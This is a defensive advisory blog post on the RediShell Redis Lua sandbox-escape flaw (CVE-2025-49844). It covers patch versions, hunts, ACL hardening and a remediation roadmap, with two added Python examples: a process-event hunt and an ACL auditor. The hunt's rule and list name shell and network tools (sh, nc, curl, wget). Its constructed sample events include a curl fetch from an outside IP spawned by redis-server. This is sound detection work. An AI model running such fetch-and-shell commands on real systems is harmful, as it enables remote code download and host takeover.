RediShell RCE Vulnerability Threatens Application Data and Memory Caches



Author: CyberDudeBivash
Powered by: CyberDudeBivash Brand | cyberdudebivash.com
Related: cyberbivash.blogspot.com

Published by CyberDudeBivash • Date: Nov 1, 2025 (IST)


RediShell (CVE-2025-49844) is a critical Redis flaw in the Lua engine that enables a sandbox escape and remote code execution on the host. Redis 8.2.2 ships the fix; thousands of internet-exposed instances remain at risk. Immediate upgrades and scripting lockdowns are essential. 

TL;DR — What Teams Must Do in 60 Seconds

  • Patch now: Upgrade Redis to 8.2.2 (the fix) or to your managed provider’s patched baseline; Valkey users should move to 8.1.4.
  • If you can’t patch today: Disable Lua (revoke EVAL/EVALSHA via ACLs) and block unauthenticated access immediately.
  • Hunt for compromise: Look for unexpected Lua scripts, Redis crashes with Lua stack traces, and shell-like outbound traffic from redis-server.

1) What Is RediShell (CVE-2025-49844)?

RediShell is a use-after-free bug in the Redis Lua scripting subsystem that lets an authenticated attacker craft a Lua script to manipulate the garbage collector, escape the sandbox, and execute arbitrary code on the host. The issue existed for ~13 years and received a critical rating (CVSS ~9.9–10). Fixed in Redis 8.2.2.

Research shows the exploit chain can end in a reverse shell, with credential theft (.ssh, cloud tokens) and full host takeover possible—particularly dangerous where Redis runs with broad file/network access.

2) Why It Threatens App Data, Caches & Queues

  • In-memory ≠ safe: Attackers with host RCE can read/write sensitive keys, JWTs, and session data stored in Redis, sabotaging auth and privacy controls.
  • Queue/stream poisoning: RCE enables tampering with streams (e.g., XADD/XREADGROUP) and pub/sub, driving fraudulent workflows or data loss.
  • Blast radius: Many Redis nodes are internet-exposed or lack auth; estimates show tens of thousands vulnerable, with hundreds of thousands publicly reachable. 
  • Cloud impact: Providers issued patches/maintenance windows; self-hosted fleets must act immediately. 

3) Detections & Hunts (Host, Network, Redis)

Host / EDR

# Suspicious child of redis-server (Linux auditd / Sysmon for Linux)
ParentImage = "*redis-server*" AND
(NewProcessName in ("*/sh","*/bash","*/dash","*/nc","*/curl","*/wget") OR
 CommandLine like "%exec%/%bin%/%sh%")
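The pseudo-rule above, implemented as a small hunt over newline-delimited JSON process events. This is an added example, not part of the original advisory or any vendor's rule set; the field names (ParentImage, Image, CommandLine) follow the Sysmon-for-Linux convention, and the sample events are constructed for the demonstration.

```python
import json
import os
import re
from typing import Dict, List

# Child process names the host/EDR rule treats as shell-like when spawned by redis-server
SHELL_LIKE = {"sh", "bash", "dash", "nc", "curl", "wget"}
# Equivalent of the rule's  CommandLine like "%exec%/%bin%/%sh%"
EXEC_SHELL_RE = re.compile(r"exec.*/bin/.*sh")

def is_suspicious(event: Dict[str, str]) -> bool:
    """Return True for a process-creation event that matches the host/EDR rule."""
    if "redis-server" not in event.get("ParentImage", ""):
        return False
    child = os.path.basename(event.get("Image", ""))
    if child == "redis-server":
        return False  # RDB/AOF background saves fork redis-server itself; not a shell
    if child in SHELL_LIKE:
        return True
    return bool(EXEC_SHELL_RE.search(event.get("CommandLine", "")))

def hunt(lines: List[str]) -> List[Dict[str, str]]:
    """Run the rule over JSON event lines; malformed lines are skipped, not fatal."""
    hits = []
    for line in lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        if is_suspicious(event):
            hits.append(event)
    return hits

# Constructed sample telemetry for this example, not captured from a real host
SAMPLE_EVENTS = [
    '{"ParentImage": "/usr/bin/redis-server", "Image": "/bin/sh", "CommandLine": "sh -c \\"exec /bin/sh\\""}',
    '{"ParentImage": "/usr/bin/redis-server", "Image": "/usr/bin/redis-server", "CommandLine": "redis-server *:6379"}',
    '{"ParentImage": "/usr/sbin/cron", "Image": "/bin/bash", "CommandLine": "bash /etc/cron.daily/logrotate"}',
    '{"ParentImage": "/opt/redis/bin/redis-server", "Image": "/usr/bin/curl", "CommandLine": "curl http://198.51.100.9/x"}',
    "not valid json",
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print("ALERT redis-server spawned", hit["Image"], "->", hit["CommandLine"])
```

The background-save fork is allowlisted explicitly; without that, a routine BGSAVE would page you every time.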

Network

  • Outbound connections from redis-server to first-seen IPs/ports (reverse shell behavior). 
  • Spikes in large EVAL/EVALSHA payloads or unusual Lua script lengths in Redis traffic.

Redis Telemetry

  • Log/alert on unexpected scripting commands (EVAL, EVALSHA) and unknown scripts in SCRIPT LIST
  • Watch for crashes with Lua stack traces in Redis logs and unexplained restarts. 

4) Mitigations & Hardening (Do These Now)

  1. Patch/Upgrade: Redis 8.2.2 (fix); Valkey 8.1.4. Confirm your managed service’s patched versions. 
  2. Disable Lua if possible: Revoke EVAL/EVALSHA via ACLs or disable scripting for non-admin roles until fully patched. 
  3. Require authentication: Enforce strong ACL users; never expose Redis directly to the internet; bind to localhost/VPC; restrict with firewalls.
  4. Principle of least privilege: Run redis-server as a non-privileged user; drop capabilities; isolate with containers/SELinux/AppArmor.
  5. Secrets hygiene: Assume tokens/keys in Redis may be compromised; rotate app secrets, JWT signing keys, and SSH credentials if intrusion suspected.
  6. Monitoring: Add alerts for scripting attempts, odd child processes, and outbound sockets from redis-server. Keep long-term logs for IR.
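A fleet-audit helper for steps 2 and 3 (and the 30-day "baseline CONFIG GET *" item below): it replays ACL LIST rules in order to see whether EVAL/EVALSHA are still reachable for an enabled user, flags nopass users, and checks the bind/protected-mode values from CONFIG GET. This is an added example, not code from the advisory or from the Redis project; the ACL lines and config values are constructed, and the password hashes are placeholders.

```python
from typing import Dict, List, Set

SCRIPTING_CMDS = {"eval", "evalsha"}  # the commands the advisory says to revoke

def scripting_allowed(tokens: List[str]) -> Set[str]:
    """Replay ACL rule tokens left to right (Redis applies them in order)."""
    allowed: Set[str] = set()
    for tok in tokens:
        t = tok.lower()
        if t in ("+@all", "allcommands"):
            allowed = set(SCRIPTING_CMDS)
        elif t in ("-@all", "nocommands"):
            allowed = set()
        elif t == "+@scripting":
            allowed |= SCRIPTING_CMDS
        elif t == "-@scripting":
            allowed -= SCRIPTING_CMDS
        elif t[:1] in "+-" and t[1:] in SCRIPTING_CMDS:
            (allowed.add if t[0] == "+" else allowed.discard)(t[1:])
    return allowed  # key patterns (~), channel patterns (&) and other flags are ignored

def audit_acl(acl_list_lines: List[str]) -> List[str]:
    """Flag enabled users that need no password or can still run EVAL/EVALSHA."""
    findings = []
    for line in acl_list_lines:
        parts = line.split()
        if len(parts) < 3 or parts[0] != "user":
            continue
        name, flags = parts[1], parts[2:]
        if "off" in flags:
            continue  # disabled users cannot authenticate, so they cannot reach Lua
        if "nopass" in flags:
            findings.append(f"{name}: nopass (unauthenticated access)")
        allowed = scripting_allowed(flags)
        if allowed:
            findings.append(f"{name}: scripting allowed ({', '.join(sorted(allowed))})")
    return findings

def audit_config(config: Dict[str, str]) -> List[str]:
    """Flag CONFIG GET values that expose the instance beyond localhost/VPC."""
    findings = []
    if config.get("protected-mode", "yes").lower() != "yes":
        findings.append("protected-mode is off")
    bind = config.get("bind", "")
    if not bind or "0.0.0.0" in bind.split() or "::" in bind.split():
        findings.append(f"bind is wide open ({bind or 'unset'})")
    return findings

SAMPLE_ACL = [  # constructed: weak default, hardened app user, partially fixed legacy user
    "user default on nopass ~* &* +@all",
    "user app on #" + "0" * 64 + " ~app:* &* +@all -@scripting",
    "user legacy on #" + "1" * 64 + " ~* &* +@all -@scripting +eval",
    "user batch off -@all",
]
SAMPLE_CONFIG = {"protected-mode": "no", "bind": "0.0.0.0"}  # constructed CONFIG GET values
```

The `app` user shows the target state (`+@all -@scripting`); `legacy` shows how a later `+eval` silently re-opens the hole, which is why the rules are replayed in order rather than grepped. Extend SCRIPTING_CMDS with EVAL_RO/EVALSHA_RO or FCALL if your version and workload use them.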

5) 30-60-90-Day Cache-Security Roadmap

  1. 30 Days: Patch all Redis/Valkey nodes; enforce ACLs; remove public exposure; baseline CONFIG GET * across fleets.
  2. 60 Days: Introduce proxy sidecars (e.g., TLS-terminating gateway), rotate secrets, and implement SIEM content for Lua/script anomalies.
  3. 90 Days: Chaos-test: simulate disabled scripting vs. app behavior; adopt managed offerings with auto-patch SLAs; formalize IR playbook for cache compromise.

FAQ

What versions are affected?

All Redis versions with Lua scripting are impacted up to 8.2.1. The fix is in 8.2.2.

Is authentication required to exploit?

Yes—authenticated access is needed to run Lua. However, many Redis servers are misconfigured without auth or are exposed publicly, making exploitation practical.

Are there signs of active exploitation?

Research and advisories emphasize the risk and provide IoCs and behaviors (reverse shells, anomalous Lua) to monitor; treat any internet-exposed, unpatched instance as high-risk. 

Sources

  • Redis — Security Advisory for CVE-2025-49844 (patch & indicators). 
  • Wiz Research — Redis Lua sandbox escape to host RCE (“RediShell”). 
  • Sysdig — CVSS 10.0 analysis and defender guidance. 
  • NVD — CVE-2025-49844 entry (fixed in 8.2.2; Lua disabled workaround). 
  • Dark Reading — Cloud-wide exposure estimates and urgency. 
  • TechRadar Pro — Patch guidance and internet-exposed counts context. 
  • Render — Managed service patch plan (Redis 6.2.20 / Valkey 8.1.4). 
  • FortiGuard & Hive Pro — Threat summaries and mitigations. 

CyberDudeBivash — Services, Apps & Ecosystem

  • Cache & Queue Security Reviews (Redis/Valkey, Memcached, RabbitMQ)
  • Detection Engineering (Lua/script anomaly rules, SIEM content, EDR tuning)
  • Incident Response (reverse-shell containment, key rotation, hardening)
